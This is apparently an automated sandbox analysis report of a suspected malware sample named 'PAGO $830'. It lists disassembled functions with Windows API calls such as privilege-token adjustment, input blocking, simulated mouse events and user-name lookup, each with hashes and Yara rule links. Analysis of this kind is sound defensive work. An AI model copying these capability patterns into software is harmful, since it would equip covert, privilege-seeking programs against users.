                                                          Function 00DD1607 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D905E8
                                                            • Part of subcall function 00D8FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D90605
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD1651
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD167E
                                                          • GetLastError.KERNEL32 ref: 00DD168E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                          • String ID:
                                                          • API String ID: 577356006-0
                                                          • Opcode ID: 7cbc9e48b472aa0d3b7dccda647403703ff33c94699869192874664078b66707
                                                          • Instruction ID: f951ec90b871beff820275bd7668922ae6ed8eaceb43da8453b0bea6dfea384b
                                                          • Opcode Fuzzy Hash: 7cbc9e48b472aa0d3b7dccda647403703ff33c94699869192874664078b66707
                                                          • Instruction Fuzzy Hash: 9B11BFB1414204BFD718AF54DC86E6AB7BCEB04710B24862EF45657241DB70FC45CB70
                                                          Function 00DDD588 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD5A0
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00DDD5DD
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD5E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: d8bb7baba5089739277fc48ef9cdbff21e80f8a3c7e004ea5f1abe7fbf9b490c
                                                          • Instruction ID: 8165d00748ba6ae794a5c32aacaf4a7f4a8ad838ac45421dd1eab1908650c7e8
                                                          • Opcode Fuzzy Hash: d8bb7baba5089739277fc48ef9cdbff21e80f8a3c7e004ea5f1abe7fbf9b490c
                                                          • Instruction Fuzzy Hash: B701B5B1901228BFE7109BADDC45FAFBABCEB09710F104616BA40F7190D2749A0587F0
                                                          Function 00DD15A7 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DD15D0
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DD15E5
                                                          • FreeSid.ADVAPI32(?), ref: 00DD15F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                                          • Instruction ID: 83614cfb4800577c52cef2aff958ad411c1922ee1b61b807b571108fd90ae663
                                                          • Opcode Fuzzy Hash: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                                          • Instruction Fuzzy Hash: F9F0F475950309FFEB00DFE59C89AAEBBBCEB08704F504565A501E2181E775AA489B60
                                                          Function 00D94C78 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000003,?,00D94C4E,00000003,00E388C8,0000000C,00D94DA5,00000003,00000002,00000000,?,00DA2879,00000003), ref: 00D94C99
                                                          • TerminateProcess.KERNEL32(00000000,?,00D94C4E,00000003,00E388C8,0000000C,00D94DA5,00000003,00000002,00000000,?,00DA2879,00000003), ref: 00D94CA0
                                                          • ExitProcess.KERNEL32 ref: 00D94CB2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 9be45c95c44ec3e287b8a26a2075bcc742b4a788822711dd00c83c7f41bc0d76
                                                          • Instruction ID: bdd1d4fb806dd681d6aa6a80e950bebc645ac6740225190cf9b9e9260f6d1336
                                                          • Opcode Fuzzy Hash: 9be45c95c44ec3e287b8a26a2075bcc742b4a788822711dd00c83c7f41bc0d76
                                                          • Instruction Fuzzy Hash: F1E08C31112208AFCF11AF65DE08E483B79EF45381F148054F8059A133CB3ADD83CBA0
                                                          Function 00DAC242 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /
                                                          • API String ID: 0-2043925204
                                                          • Opcode ID: 5bbe1984a83c9e51259183c4766e43f7c7bf3b6b02d1b364fc5296bc67269a51
                                                          • Instruction ID: 669fd6169470ed57b46d784e0a26bde00ea80922a048d591cad22461f65a920c
                                                          • Opcode Fuzzy Hash: 5bbe1984a83c9e51259183c4766e43f7c7bf3b6b02d1b364fc5296bc67269a51
                                                          • Instruction Fuzzy Hash: 85413B769002196FCF249FB9DC89EBB77B8EB86324F144268F915D7180E6709E81CB74
                                                          Function 00DDE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00DDE30B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID: DOWN
                                                          • API String ID: 2434400541-711622031
                                                          • Opcode ID: fe8e5dc40d05fd4d9f816880e05820d2a787e2f1b78ec33e184329c28ad2f8de
                                                          • Instruction ID: 099fbf7e26e596b5fbbd02cd009af32bcbe650dd7b1bbf9388cb470dffc91623
                                                          • Opcode Fuzzy Hash: fe8e5dc40d05fd4d9f816880e05820d2a787e2f1b78ec33e184329c28ad2f8de
                                                          • Instruction Fuzzy Hash: 12E08C361CC7223CBA4822157C0AEB7038C8B16335B21120FF900E92C2EE846C8694B9
                                                          Function 00DCDA16 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00DCDA28
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID: X64
                                                          • API String ID: 2645101109-893830106
                                                          • Opcode ID: aa44374cc26dea9a6a40206aac51d5c74eadd16402bcb8dc4c9d35c146ab8862
                                                          • Instruction ID: ec29b4db48160d841fb957eec420d4fe91897f34dc40b3bbf37e9a568b5fbee6
                                                          • Opcode Fuzzy Hash: aa44374cc26dea9a6a40206aac51d5c74eadd16402bcb8dc4c9d35c146ab8862
                                                          • Instruction Fuzzy Hash: 99D0E9B581511DEECB94DB90DC88DD9777DBB14304F104655F546E2140D77495889F20
                                                          Function 00D9CA30 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
                                                          • Instruction ID: 565f1bc11ad01018e04ba6eea9e4673aa7b7cba44b1f95fae0ef1e227c95d023
                                                          • Opcode Fuzzy Hash: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
                                                          • Instruction Fuzzy Hash: B2022D71E112199BDF14CFA9C8806ADBBF1FF48314F298169E919E7384D731AE41CBA4
                                                          Function 00D7E3F0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Variable is not of type 'Object'.$p#
                                                          • API String ID: 0-1086706999
                                                          • Opcode ID: a64b4a907f8b09368ac12277adda4cffac23ea4892a28a7c3cb6b0c192bee08d
                                                          • Instruction ID: 99caaff7075fa7542cb4eb185edbd48542536ae4bc560278b937c4281648c369
                                                          • Opcode Fuzzy Hash: a64b4a907f8b09368ac12277adda4cffac23ea4892a28a7c3cb6b0c192bee08d
                                                          • Instruction Fuzzy Hash: F3327C74900219DBDF14DF90C890BEDB7B5FF19308F188099E84AAB292E7759E46CB71
                                                          Function 00DE680C Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DE6836
                                                          • FindClose.KERNEL32(00000000), ref: 00DE687F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: a04e3e4c29a94f9bc2ea1742e0db68765e4c90b9b07cf768e4dae2f8cbbc8207
                                                          • Instruction ID: a0829de06215ab8bdfd31d325f64da54fa96fa786a40334c938a87bc84682a18
                                                          • Opcode Fuzzy Hash: a04e3e4c29a94f9bc2ea1742e0db68765e4c90b9b07cf768e4dae2f8cbbc8207
                                                          • Instruction Fuzzy Hash: E81181716046409FC710DF6AC4C8A15BBE4EF85328F58C6A9E4698F6A2C731EC45CBA1
                                                          Function 00DE36D3 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DF47B8,?,?,00000035,?), ref: 00DE3702
                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DF47B8,?,?,00000035,?), ref: 00DE3712
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: fab5c9308c89ff90a508ba77ca14378551ad022c22efb2461b1fffe80f25deea
                                                          • Instruction ID: 797c7e587c163ec6d10586440146ac73f7fb9ac2ff0d45cfcf143fcc1af28b8a
                                                          • Opcode Fuzzy Hash: fab5c9308c89ff90a508ba77ca14378551ad022c22efb2461b1fffe80f25deea
                                                          • Instruction Fuzzy Hash: ECF065B57002256AE72077B69C4DFEB7A6EEFC5761F100265F509E3181DA60DD44C6B0
                                                          Function 00DD1003 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD1140), ref: 00DD1018
                                                          • CloseHandle.KERNEL32(?,?,00DD1140), ref: 00DD102D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 385edfbe7fd380ea0206ca60b6516c94702265613995dd44f224bc007404664c
                                                          • Instruction ID: 648ba8e9df3f06c8b69e5c7bdc27117fca3cf83d42d7044b19432f671596601c
                                                          • Opcode Fuzzy Hash: 385edfbe7fd380ea0206ca60b6516c94702265613995dd44f224bc007404664c
                                                          • Instruction Fuzzy Hash: 6AE04F32014600FEE7252B11EC05E7277E9EB04310B24892DF59580471DB626CD0DB20
                                                          Function 00DA66FB Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00DA66F6,00000000,?,00000008,?,?,00DAFE9F,00000000), ref: 00DA6928
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: c228e12876493fcf5d07a21bae67e2c0c8500a7e775d29668edd20d80d9ee4ab
                                                          • Instruction ID: f52d22b89978d90e7114658184d39961913ffa66c089ca11abab9c638e9b34f9
                                                          • Opcode Fuzzy Hash: c228e12876493fcf5d07a21bae67e2c0c8500a7e775d29668edd20d80d9ee4ab
                                                          • Instruction Fuzzy Hash: 27B12832610608DFD715CF28C48AB657BA0FF46364F2D8658E899CF2E1C339E992CB50
                                                          Function 00DEE9C9 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 00DEE9E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: be836178b6cf74255040e1ed3303f71f967a3567ba80902a6dd5262b161f9917
                                                          • Instruction ID: 1f6e42c74e1f75610c5c3f579ffe8ef73200d546e17755359fc31e9728495317
                                                          • Opcode Fuzzy Hash: be836178b6cf74255040e1ed3303f71f967a3567ba80902a6dd5262b161f9917
                                                          • Instruction Fuzzy Hash: E3E0DF312102009FC310AF6AD801A9AB7E8EF98760F00C02AF949E7322DB70EC418BB1
                                                          Function 00D90955 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020961,00D9036E), ref: 00D9095A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: f186ac7058fcd44e0428ceae095a4e89a6af1c17275212b340581a0e81fbe83a
                                                          • Instruction ID: 163ad4dd71685a5c1f7fb5648987906b9c495a60a80fa24cdaed1aff40593c14
                                                          • Opcode Fuzzy Hash: f186ac7058fcd44e0428ceae095a4e89a6af1c17275212b340581a0e81fbe83a
                                                          • Instruction Fuzzy Hash:
                                                          Function 00D977AB Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                          • Instruction ID: 8c67385ed3919ec1b017e5fa22e23dbaa888173cab96d1ca060eeca9e4ebd420
                                                          • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                          • Instruction Fuzzy Hash: 4251366173C64566DF389668895D7FF27D9DF02340F1C090AE882D7282C615EE05D7B6
                                                          Function 00DA6D79 Relevance: .6, Instructions: 637COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a934f786b7c05eebcee8b9298402b5062ecabae02b58a804fea921abc4153aeb
                                                          • Instruction ID: 8145a97dbcd35c4fb745fbf54b83578b3669b0871bad0f62258b723eac6555ae
                                                          • Opcode Fuzzy Hash: a934f786b7c05eebcee8b9298402b5062ecabae02b58a804fea921abc4153aeb
                                                          • Instruction Fuzzy Hash: 92322732E29F414DD7239A35DC22335A689AFB73C5F15D737F82AB59A6EB29C4834100
                                                          Function 00D8D3B5 Relevance: .6, Instructions: 635COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
